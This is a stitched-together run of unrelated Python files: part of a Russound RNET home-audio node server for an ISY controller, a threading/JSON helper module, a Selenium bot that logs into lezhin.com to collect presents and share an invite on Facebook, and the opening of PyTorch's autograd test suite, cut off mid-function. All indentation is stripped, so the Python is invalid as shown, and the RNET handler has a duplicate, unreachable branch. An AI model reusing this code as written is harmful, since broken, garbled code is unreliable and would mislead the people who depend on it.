self.nodes[zone_addr].set_balance(int(msg.MessageData()[20]))
elif msg.MessageType() == RNET_MSG_TYPE.ZONE_LOUDNESS:
LOGGER.debug(' -> Zone %d loudness = 0x%x' % (zone, msg.MessageData()[20]))
self.nodes[zone_addr].set_loudness(int(msg.MessageData()[20]))
elif msg.MessageType() == RNET_MSG_TYPE.ZONE_PARTY_MODE:
LOGGER.debug(' -> Zone %d party mode = 0x%x' % (zone, msg.MessageData()[20]))
self.nodes[zone_addr].set_party_mode(int(msg.MessageData()[20]))
elif msg.MessageType() == RNET_MSG_TYPE.ZONE_DO_NOT_DISTURB:
LOGGER.debug(' -> Zone %d do not disturb = 0x%x' % (zone, msg.MessageData()[20]))
self.nodes[zone_addr].set_dnd(int(msg.MessageData()[20]))
elif msg.MessageType() == RNET_MSG_TYPE.UPDATE_SOURCE_SELECTION:
# We can use this to check for sources going on/off (or really
# being activated/deactivated). The value returned is a bitmap
# that indicates which sources are active. By looking at what
# has changed since the last time we saw this message, we can
# track the source state transitions.
LOGGER.debug(' -> Update Zone source 0x%x 0x%x' % (msg.MessageData()[0], msg.MessageData()[1]))
# First, look only at what has changed since the last time this
# was called.
ns = msg.MessageData()[0]
ss = ns ^ self.source_status
# Based on what changed send a command to the ISY that
# can be used as a source activated trigger.
if (ss & 0x01) == 0x01: # source 1 changed
LOGGER.info('Source 1 changed')
if (ns & 0x01) == 0x01: # source 1 activated
self.setDriver('GV1', 1)
else:
self.setDriver('GV1', 0)
if (ss & 0x02) == 0x02: # source 2 changed
LOGGER.info('Source 2 changed')
if (ns & 0x02) == 0x02: # source 2 activated
self.setDriver('GV2', 1)
else:
self.setDriver('GV2', 0)
if (ss & 0x04) == 0x04: # source 3 changed
LOGGER.info('Source 3 changed')
if (ns & 0x04) == 0x04: # source 3 activated
self.setDriver('GV3', 1)
else:
self.setDriver('GV3', 0)
if (ss & 0x08) == 0x08: # source 4 changed
LOGGER.info('Source 4 changed')
if (ns & 0x08) == 0x08: # source 4 activated
self.setDriver('GV4', 1)
else:
self.setDriver('GV4', 0)
if (ss & 0x10) == 0x10: # source 5 changed
LOGGER.info('Source 5 changed')
if (ns & 0x10) == 0x10: # source 5 activated
self.setDriver('GV5', 1)
else:
self.setDriver('GV5', 0)
if (ss & 0x20) == 0x20: # source 6 changed
LOGGER.info('Source 6 changed')
if (ns & 0x20) == 0x20: # source 6 activated
self.setDriver('GV6', 1)
else:
self.setDriver('GV6', 0)
self.source_status = ns
elif msg.MessageType() == RNET_MSG_TYPE.UNDOCUMENTED:
# this seems to be the only thing we get when we select
# a source from the keypad.
# example:
# 49 03 00 00 05
# MessageData[0] varies
# MessageData[1] is the source
# MessageData[4] is 5, does this mean source select?
# param 0x90 is volume?
# event data:
# 0x01 (01) == 2
# 0x0c (12) == 24
# 0x0d (13) == 26
# 0x0e (14) == 28
# 0x16 (22) == 44
if msg.EventId() == 0x90:
LOGGER.debug(' -> Volume adjusted to: ' + str(msg.EventData()))
elif msg.MessageData()[4] == 0x05: # source selection
LOGGER.debug(' -> Zone {} set to source {}'.format(zone_addr, msg.MessageData()[1]+1))
self.nodes[zone_addr].set_source(int(msg.MessageData()[1]))
else:
LOGGER.debug(' -> param 0x%x = 0x%x for zone %d' % (msg.EventId(), msg.EventData(), msg.EventZone()))
#LOGGER.debug(' D ' + ' '.join('{:02x}'.format(x) for x in msg.MessageData()))
# Do we care about keypad events? Maybe in the sense that we'd
# like to create a program that is something like:
#
# if zone keypress == Next then do something
#
# which means we need a node driver that holds the last keypress
# value.
elif msg.MessageType() == RNET_MSG_TYPE.ALL_ZONE_INFO:
LOGGER.info('All zone info for ' + zone_addr)
LOGGER.debug(' ' + ' '.join('{:02x}'.format(x) for x in msg.MessageData()))
LOGGER.info(' power state = ' + str(msg.MessageData()[0]))
LOGGER.info(' source = ' + str(msg.MessageData()[1] + 1))
LOGGER.info(' volume = ' + str(msg.MessageData()[2]))
LOGGER.info(' bass = ' + str(msg.MessageData()[3]))
LOGGER.info(' treble = ' + str(msg.MessageData()[4]))
LOGGER.info(' loudness = ' + str(msg.MessageData()[5]))
LOGGER.info(' balance = ' + str(msg.MessageData()[6]))
LOGGER.info(' party = ' + str(msg.MessageData()[7]))
LOGGER.info(' dnd = ' + str(msg.MessageData()[8]))
self.nodes[zone_addr].set_power(int(msg.MessageData()[0]))
self.nodes[zone_addr].set_source(int(msg.MessageData()[1]))
self.nodes[zone_addr].set_volume(int(msg.MessageData()[2]))
self.nodes[zone_addr].set_bass(int(msg.MessageData()[3]))
self.nodes[zone_addr].set_treble(int(msg.MessageData()[4]))
self.nodes[zone_addr].set_loudness(int(msg.MessageData()[5]))
self.nodes[zone_addr].set_balance(int(msg.MessageData()[6]))
self.nodes[zone_addr].set_party_mode(int(msg.MessageData()[7]))
self.nodes[zone_addr].set_dnd(int(msg.MessageData()[8]))
self.set_source_selection(msg.MessageData()[0], msg.MessageData()[1])
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_POWER:
# The power key is special. We'd like it to send either DON or DOF
# depending on what state we'll be moving into
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
if self.nodes[zone_addr].get_power():
self.nodes[zone_addr].keypress('DOF')
else:
self.nodes[zone_addr].keypress('DON')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_FAV1:
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
self.nodes[zone_addr].keypress('GV18')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_FAV2:
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
self.nodes[zone_addr].keypress('GV19')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_PLUS:
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
self.nodes[zone_addr].keypress('BRT')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_MINUS:
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
self.nodes[zone_addr].keypress('DIM')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_NEXT:
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
self.nodes[zone_addr].keypress('GV16')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_PREVIOUS:
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
self.nodes[zone_addr].keypress('GV15')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_SOURCE:
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
self.nodes[zone_addr].keypress('GV14')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_PLAY:
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
self.nodes[zone_addr].keypress('GV17')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_VOL_UP:
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
self.nodes[zone_addr].keypress('GV12')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_VOL_DOWN:
zone_addr = 'zone_' + str(msg.SourceZone() + 1)
self.nodes[zone_addr].keypress('GV13')
elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_NEXT:
LOGGER.debug(' -> Keypad next')
elif msg.MessageType() == RNET_MSG_TYPE.UNKNOWN_SET:
# don't think we really care about these
LOGGER.debug('US -> ' + ' '.join('{:02x}'.format(x) for x in msg.MessageRaw()))
else:
LOGGER.debug(' -> TODO: message id ' + str(msg.MessageType().name) + ' not yet implemented.')
def set_logging_level(self, level=None):
if level is None:
try:
level = self.get_saved_log_level()
except:
LOGGER.error('set_logging_level: get saved level failed.')
if level is None:
level = 10
level = int(level)
else:
level = int(level['value'])
self.save_log_level(level)
LOGGER.info('set_logging_level: Setting log level to %d' % level)
LOGGER.setLevel(level)
commands = {
'UPDATE_PROFILE': update_profile,
'REMOVE_NOTICES_ALL': remove_notices_all,
'DEBUG': set_logging_level,
}
# For this node server, all of the info is available in the single
# controller node.
drivers = [
{'driver': 'ST', 'value': 1, 'uom': 2}, # node server status
{'driver': 'GV1', 'value': 0, 'uom': 25}, # source 1 On/off status
{'driver': 'GV2', 'value': 0, 'uom': 25}, # source 2 On/off status
{'driver': 'GV3', 'value': 0, 'uom': 25}, # source 3 On/off status
{'driver': 'GV4', 'value': 0, 'uom': 25}, # source 4 On/off status
{'driver': 'GV5', 'value': 0, 'uom': 25}, # source 5 On/off status
{'driver': 'GV6', 'value': 0, 'uom': 25}, # source 6 On/off status
]
|
AsynchronousThreading.py | """
"""
import threading
from UsefulTools.UtilsFunctions import pt
import traceback
import json
def object_to_json(object, attributes_to_delete=None):
"""
Convert class to json with properties method.
:param attributes_to_delete: String set with all attributes' names to delete from properties method
:return: sort json from class properties.
"""
try:
object_dictionary = class_properties(object=object, attributes_to_delete=attributes_to_delete)
json_string = json.dumps(object, default=lambda m: object_dictionary, sort_keys=True, indent=4)
except Exception as e:
pt(e)
pt(traceback.print_exc())
raise ValueError("STOP")
return json_string
def execute_asynchronous_thread(functions, arguments=None, kwargs=None):
Thread(functions=functions, arguments=arguments, kwargs=kwargs)
class Thread():
"""
"""
def __init__(self, functions, arguments=None, kwargs=None):
datatype = self.__check_type__(functions)
if datatype == type(list()):
pass
else:
self._execute_process(function_def=functions, arguments=arguments, kwargs=kwargs)
def __check_type__(self, object):
return type(object)
def _execute_process(self, function_def, arguments=None, kwargs=None):
if not arguments:
arguments = ()
if type(function_def) == type(str("")):
name = function_def
else:
name = function_def.__name__
process = threading.Thread(name=name, target=function_def, args=arguments, kwargs=kwargs)
process.start()
def class_properties(object, attributes_to_delete=None):
"""
Return a string with actual object features without not necessaries
:param attributes_to_delete: represent witch attributes set must be deleted.
:return: A copy of class.__dic__ without deleted attributes
"""
pt("object", object)
dict_copy = object.__dict__.copy() # Need to be a copy to not get original class' attributes.
return dict_copy |
__init__.py | from selenium import webdriver
from JupJup import Login, Present, Share
from JupJup import config
from multiprocessing import Process
import time
class CoinJupJupManager:
def __init__(self):
self.data = config.USERDATA
def start(self):
p_collect = Process(target=self.collect_task)
p_share = Process(target=self.share_task)
p_collect.start()
p_share.start()
def collect_task(self):
driver = webdriver.PhantomJS()
login = Login.factory.LoginFactory.login_class(config.LOGIN_METHOD, driver, self.data)
collector = Present.collector.PresentCollector(driver)
last_collected_at = time.time()
collected_done = False
while True:
if not collected_done:
driver.maximize_window()
self.attend(driver, login)
self.collect_presents(driver, collector)
self.reset(driver)
collected_done = True
if time.time() - last_collected_at > config.COLLECT_PERIOD:
last_collected_at = time.time()
collected_done = False
time.sleep(config.WORK_PERIOD)
def share_task(self):
driver = webdriver.PhantomJS()
login = Login.factory.LoginFactory.login_class(config.LOGIN_METHOD, driver, self.data)
share = Share.share_facebook.ShareFacebook(driver)
last_shared_at = time.time()
shared_done = False
while True:
if not shared_done:
driver.maximize_window()
self.attend(driver, login)
self.share_lezhin(driver, share)
self.reset(driver)
shared_done = True
if time.time() - last_shared_at > config.SHARE_PERIOD:
last_shared_at = time.time()
shared_done = False
time.sleep(config.WORK_PERIOD)
def attend(self, driver, login):
print('attend start')
driver.get('https://www.lezhin.com/ko')
time.sleep(config.WAIT_LONG)
login.do_work()
print('attend finish')
def collect_presents(self, driver, collector):
print('present collect start')
driver.get('https://www.lezhin.com/ko/present')
time.sleep(config.WAIT_LONG)
collector.collect_all()
print('present collect finish')
def share_lezhin(self, driver, share):
print('share lezhin start')
driver.get('https://www.lezhin.com/ko/payment#invite')
time.sleep(config.WAIT_LONG)
share.do_work()
time.sleep(config.WAIT_LONG)
print('share lezhin finish')
def reset(self, driver):
driver.get('https://www.lezhin.com/ko')
#delete cookies to ensure that naver login process is always same
driver.delete_all_cookies()
|
test_autograd.py | import gc
import sys
import io
import math
import random
import tempfile
import time
import threading
import unittest
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, format_time, EventList,
FunctionEvent, FunctionEventAvg,
record_function, emit_nvtx)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
load_tests,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM, disable_gc,
gradcheck, gradgradcheck, make_tensor)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing import randn_like
from torch.testing._internal.common_methods_invocations import (
unpack_variables,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf, skipMeta)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
import pickle
PRECISION = 1e-4
def graph_desc(fn):
if fn is None:
return 'None'
result = type(fn).__name__ + '('
next_functions = fn.next_functions
for next_fn, _ in next_functions:
result += graph_desc(next_fn)
result += ', '
if next_functions:
result = result[:-2]
return result + ')'
class TestAutograd(TestCase):
def test_tensor_grad_warnings(self):
dummy = torch.empty(1)
with warnings.catch_warnings(record=True) as w:
# Accessing .grad on leaf
dummy.requires_grad_()
foo = dummy.grad
self.assertEqual(len(w), 0)
# Accessing .grad on non-leaf
dummy = dummy.clone()
foo = dummy.grad
self.assertEqual(len(w), 1)
# Accessing .grad on non-leaf that retains gradients
dummy.retain_grad()
foo = dummy.grad
self.assertEqual(len(w), 1)
def _function_test(self, cls):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
result = cls.apply(x, 2, y)
go = torch.ones((), requires_grad=True)
result.sum().backward(go, create_graph=True)
self.assertEqual(x.grad, y + torch.ones(5, 5))
self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
self.assertIsNotNone(x.grad.grad_fn)
self.assertIsNotNone(y.grad.grad_fn)
return x, y
def test_function(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_tensors
# NOTE: self is the test case here
self.assertIsInstance(var1, torch.Tensor)
self.assertIsInstance(var2, torch.Tensor)
self.assertIsInstance(grad_output, torch.Tensor)
return (grad_output + grad_output * var2, None,
grad_output * ctx.pyscalar + grad_output * var1)
x, y = self._function_test(MyFunction)
x_grad_desc = graph_desc(x.grad.grad_fn)
y_grad_desc = graph_desc(y.grad.grad_fn)
self.assertExpected(x_grad_desc, "x_grad_desc")
self.assertExpected(y_grad_desc, "y_grad_desc")
def test_once_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, pyscalar, tensor2):
ctx.pyscalar = pyscalar
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + pyscalar * tensor2 + tensor1 * tensor2
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
self.assertFalse(torch.is_grad_enabled())
t1, t2 = ctx.saved_tensors
return (grad_output + grad_output * t2, None,
grad_output * ctx.pyscalar + grad_output * t1)
x, y = self._function_test(MyFunction)
self.assertEqual(graph_desc(x.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
self.assertEqual(graph_desc(y.grad.grad_fn),
'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
def test_function_returns_input(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
return grad * 2
for shape in [(1,), ()]:
v = torch.ones(shape, requires_grad=True)
MyFunction.apply(v).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
with torch.no_grad():
v.grad.zero_()
MyFunction.apply(v.clone()).backward()
self.assertEqual(v.grad, torch.full(shape, 2.))
def test_function_returns_undefined_tensor(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad):
return None
# Test that undefined tensors returned from custom backward function
# are propagated as undefined and not tensor full of zeroes
x = torch.ones(1, requires_grad=True)
MyFunction.apply(x).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x ** 2).backward()
self.assertIsNone(x.grad)
MyFunction.apply(x).sum().backward()
self.assertIsNone(x.grad)
self.assertIsNone(torch.autograd.grad(MyFunction.apply(x), x, allow_unused=True)[0])
def test_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad):
self.assertEqual(grad, torch.zeros(1))
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_dont_materialize_grads(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
ctx.set_materialize_grads(False)
return x
@staticmethod
def backward(ctx, grad):
self.assertIsNone(grad)
return grad
x = torch.ones(1, requires_grad=True)
torch._C._functions.UndefinedGrad()(MyFunction.apply(x)).backward()
def test_legacy_function_deprecation_exception(self):
# Trigger exception
class MyFunction(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
# Check exception occurs
with self.assertRaisesRegex(
RuntimeError,
'Legacy autograd function with non-static forward method is deprecated'):
MyFunction()(torch.randn(3, 4))
class SimulateBackwardError(Function):
@staticmethod
def forward(ctx, input):
return input.clone()
@staticmethod
@once_differentiable
def backward(ctx, input):
raise Exception("Simulate error on backward pass")
def test_custom_function_exception(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
tmp = (t1 + t2) * (t1 + t2)
t3 = TestAutograd.SimulateBackwardError.apply(tmp)
with self.assertRaisesRegex(Exception, "Simulate error on backward pass"):
t3.sum().backward()
def test_custom_function_non_tensor_inputs_outputs(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
# Save scale
ctx.scale = scale
ctx.save_for_backward(t1, t2, t3)
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *grads):
# Verify grads
self.assertEqual(7, len(grads))
self.assertIsNone(grads[0])
self.assertIsNone(grads[2])
self.assertIsNone(grads[3])
self.assertIsNone(grads[5])
scale = ctx.scale
var1, var2, var3 = ctx.saved_tensors
return (
grads[1] * scale + grads[4] * var2 * scale + grads[6],
grads[1] * var3 * scale + grads[4] * var1 * scale,
None,
grads[1] * var2 * scale + grads[4] * scale,
)
t1 = torch.rand(10, dtype=torch.double, requires_grad=True)
t2 = torch.rand(10, dtype=torch.double, requires_grad=True)
t3 = torch.rand(10, dtype=torch.double)
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
# Validate running backward.
torch.autograd.backward([res[1].sum(), res[4].sum(), res[6].sum()])
self.assertIsNotNone(t1.grad)
self.assertIsNotNone(t2.grad)
self.assertIsNone(t3.grad)
# Test gradcheck
def foo(t1, t2, t3):
res = MyFunction.apply(t1, t2, scale, t3)
return res[1], res[4], res[6]
gradcheck(foo, (t1, t2, t3))
def test_custom_function_no_tensors(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, t1, t2, scale, t3):
t4 = t1 + t2 * t3
t5 = t1 * t2 + t3
t4 *= scale
t5 *= scale
return scale, t4, None, True, t5, "bar", t1
@staticmethod
@once_differentiable
def backward(ctx, *args):
return (args[0], args[1], None, args[2])
t1 = random.random()
t2 = random.random()
t3 = random.random()
scale = random.randint(0, 10)
res = MyFunction.apply(t1, t2, scale, t3)
self.assertEqual(scale, res[0])
self.assertEqual((t1 + t2 * t3) * scale, res[1])
self.assertEqual(None, res[2])
self.assertEqual(True, res[3])
self.assertEqual((t1 * t2 + t3) * scale, res[4])
self.assertEqual("bar", res[5])
self.assertEqual(t1, res[6])
def test_invalid_gradients(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x * 2
@staticmethod
def backward(ctx, grad_output):
return torch.randn(10, dtype=torch.float)
with self.assertRaisesRegex(RuntimeError, 'expected shape'):
input = torch.randn(5, 5, dtype=torch.float, requires_grad=True)
MyFunction.apply(input).sum().backward()
def test_unrelated_inputs(self):
# test to ensure grad(grad)check runs successfully even if there is an
# unrelated (but differentiable) inputs
def my_function(x, y):
return x * x
x = torch.rand(10, dtype=torch.double, requires_grad=True)
y = torch.rand(10, dtype=torch.double, requires_grad=True)
gradcheck(my_function, (x, y))
gradgradcheck(my_function, (x, y))
def test_not_implemented_grad(self):
a = torch.rand(2, requires_grad=True)
# if grad for nextafter ends up being implemented, this should be changed
y = torch.nextafter(a, a).sum()
with self.assertRaisesRegex(
NotImplementedError,
'the derivative for .* is not implemented'):
y.backward()
def test_not_implemented_fwad(self):
x = torch.randn(3)
v = torch.rand(3)
mat = torch.randn(2, 3)
with fwAD.dual_level():
dual_x = fwAD.make_dual(x, v)
err_msg = r"Trying to use forward AD with .* that does not support it"
hint_msg = "Running forward AD for an OP that does not implement it should raise a NotImplementedError"
with self.assertRaisesRegex(NotImplementedError, err_msg, msg=hint_msg):
# if forward AD ends up being implemented for torch.mv, choose a different op
res = torch.mv(mat, dual_x)
def test_accumulate_grad(self):
grad_output = torch.ones(5, 5)
def compute_grad(create_graph):
x = torch.randn(5, 5, requires_grad=True)
y = x + 2
y.backward(grad_output, retain_graph=True)
x_grad = x.grad
x_grad_clone = x.grad.clone()
y.backward(grad_output, create_graph=create_graph)
return x_grad, x_grad_clone
# Accumulate in-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=False)
self.assertEqual(x_grad, x_grad_clone * 2)
# Accumulate out-of-place when create_graph is False
x_grad, x_grad_clone = compute_grad(create_graph=True)
self.assertEqual(x_grad, x_grad_clone)
def test_accumulate_grad_tensor_reference(self):
def _test_grad_tensor(params_grad_tensor, backward_grad_tensor, should_preserve_reference, create_graph):
params = torch.tensor([1.5, 1.5]).requires_grad_()
params.grad = params_grad_tensor
grad_saved = params.grad
params.backward(backward_grad_tensor, create_graph=create_graph)
self.assertEqual(id(grad_saved) == id(params.grad), should_preserve_reference)
for create_graph in (False, True):
# Accumulate dense gradient to sparse gradient will change the `params.grad` reference
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.tensor([1.5, 1.5]),
False, # never accumulates in-place
create_graph)
# Accumulate dense gradient to dense gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.tensor([1.5, 1.5]),
torch.tensor([1.5, 1.5]),
not create_graph,
create_graph)
# Accumulate sparse gradient to sparse gradient will preserve the `params.grad` reference,
# but only if create_graph=False.
_test_grad_tensor(
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.])),
not create_graph,
create_graph)
@skipIfNoLapack
def test_slogdet_sign(self):
a = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
s, logdet = a.slogdet()
# test that sign should not require grad
self.assertFalse(s.requires_grad)
# test that backward through computation involving sign works
def sign_mul_logdet(mat):
s, logdet = mat.slogdet()
return s * logdet
u, s, v = a.detach().svd()
s.abs_().clamp_(0.0001)
for sign in (-1, 1):
s[-1] = sign
mat = torch.linalg.multi_dot([u, s.diag(), v.t()]).requires_grad_()
gradcheck(sign_mul_logdet, mat)
gradgradcheck(sign_mul_logdet, mat)
def test_sum_to_with_empty_dim_grad(self):
a = torch.rand(4, 0, requires_grad=True)
b = torch.rand(4, 1, requires_grad=True)
c = a + b
assert c.shape == (4, 0)
c.sum().backward()
self.assertEqual(b.grad, torch.zeros(4, 1))
self.assertEqual(a.grad, torch.zeros(4, 0))
def test_hessian_vector(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
with torch.no_grad():
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
grad_sum.backward(torch.ones(2, 2))
x_hv = torch.ones(2, 2) * 5
y_hv = torch.ones(2, 2) * 4
self.assertEqual(x.grad, x_grad + x_hv)
self.assertEqual(y.grad, y_grad + y_hv)
def test_grad(self):
x = torch.randn(2, 2, requires_grad=True)
y = torch.randn(2, 2, requires_grad=True)
z = x ** 2 + y * x + y ** 2
z.backward(torch.ones(2, 2), create_graph=True)
x_grad = 2 * x + y
y_grad = x + 2 * y
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
grad_sum = 2 * x.grad + y.grad
x_hv = torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[torch.ones(2, 2)],
inputs=[x], create_graph=True)
expected_x_hv = torch.ones(2, 2) * 5
expected_y_hv = torch.ones(2, 2) * 4
self.assertEqual(x_hv[0], expected_x_hv)
self.assertEqual(x.grad, x_grad)
self.assertEqual(y.grad, y_grad)
# Test that grad_outputs and outputs have the same shape
grad_out = torch.ones(2)
try:
torch.autograd.grad(
outputs=[grad_sum], grad_outputs=[grad_out],
inputs=[x], create_graph=True)
self.assertFail()
except RuntimeError as error:
self.assertEqual(str(error), "Mismatch in shape: grad_output[0] has a shape of "
+ str(grad_out.shape) + " and output[0] has a shape of "
+ str(grad_sum.shape) + ".")
def test_grad_nonleaf(self):
x_init = torch.randn(2, 2, requires_grad=True)
x = x_init
y = torch.randn(2, 2, requires_grad=True)
grad_output = torch.ones(2, 2)
def fn(x):
return x ** 2 + y * x + y ** 2
for _ in range(5):
grad_x, = torch.autograd.grad(
fn(x), x, grad_outputs=grad_output, create_graph=True)
grad_x_expected = 2 * x + y
self.assertIsNone(y.grad)
self.assertIsNone(x.grad)
self.assertEqual(grad_x, grad_x_expected)
x = x + 0.05 * grad_x
val_init = fn(x_init).sum()
val_final = fn(x).sum()
self.assertGreater(val_final, val_init)
x.backward(grad_output)
self.assertIsNotNone(y.grad)
self.assertIsNotNone(x_init.grad)
def test_grad_nonleaf_many_outputs(self):
# This checks an edge case for function callbacks
# We want to capture two grads of a function, but can only
# register a single callback.
x = torch.randn(4, 2, requires_grad=True)
a, b = x.chunk(2)
def hook(*grads):
hook_called[0] = True
hook_called = [False]
x.register_hook(hook)
go = torch.randn(2, 2)
grad_a, grad_b = torch.autograd.grad(
(a + 2 * b), [a, b], grad_outputs=go, create_graph=True)
self.assertEqual(grad_a, go)
self.assertEqual(grad_b, go * 2)
self.assertFalse(hook_called[0])
self.assertIsNone(x.grad)
def test_grad_nonleaf_register_hook(self):
# This checks an edge case for register_hook.
# We want to capture grad of a nonleaf tensor,
# but avoid segfault during backward of other nonleaf tensors
x = torch.randn(5, requires_grad=True)
x_list = x.unbind()
x0 = x_list[0]
hook_results = [None]
def hook(grad):
hook_results[0] = grad
x0.register_hook(hook)
x_list[0].backward()
self.assertEqual(hook_results[0], torch.tensor(1.))
expected_grad = torch.tensor([1., 0, 0, 0, 0])
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[0].grad)
for i in range(1, 5, 1):
x_list[i].backward()
self.assertEqual(hook_results[0], None)
expected_grad[i] = 1.0
self.assertEqual(x.grad, expected_grad)
self.assertIsNone(x_list[i].grad)
def test_hook_with_no_name(self):
# Create a hook that do not have a __name__ attribute
class MyHookClass:
def __call__(self, grad):
return grad.clone()
x = torch.randn(5, requires_grad=True).clone()
x.register_hook(MyHookClass())
x.sum().backward()
# Should run fine
def test_sharded_grad(self):
leaves = [torch.zeros(5, 5, requires_grad=True) for _ in range(10)]
intermediates = [l * i + l * l for i, l in enumerate(leaves)]
loss = sum(v * i for i, v in enumerate(intermediates)).sum()
# define a helper for dividing intermediates into groups
def group(l, group_size):
return (l[i:i + group_size] for i in range(0, len(l), group_size))
# Compute the d loss / d intermediates in chunks of shard_size
shard_size = 2
d_intermediates = [d_i for intermediates_batch in group(intermediates, shard_size)
for d_i in torch.autograd.grad(loss, intermediates_batch)]
# Compute rest of backward pass
torch.autograd.backward(intermediates, d_intermediates)
for i, l in enumerate(leaves):
self.assertEqual(l.grad, i * i * (1 + l))
def test_backward_badcalls(self):
x = torch.ones(1)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
x.backward()
def test_grad_badcalls(self):
x = torch.ones(1)
y = x ** 2
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(x, y)
with self.assertRaisesRegex(RuntimeError, 'does not require grad'):
torch.autograd.grad(y, x)
x = torch.ones(1, requires_grad=True)
y = x ** 2
torch.autograd.grad(y, x) # this should succeed now
def test_grad_empty_inputs(self):
x = torch.tensor([1.0], requires_grad=True)
with self.assertRaisesRegex(ValueError, "grad requires non-empty inputs."):
torch.autograd.grad(2 * x, [], grad_outputs=torch.tensor([1.0]))
def test_grad_fn_badcalls(self):
error_regex = 'expected .* arguments, got .* instead'
x = torch.ones(1, requires_grad=True)
y = x ** 2
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn(x.detach(), x.detach()) # too many
with self.assertRaisesRegex(TypeError, error_regex):
y.grad_fn() # too few
y.grad_fn(x.detach()) # this should succeed
def test_grad_unreachable(self):
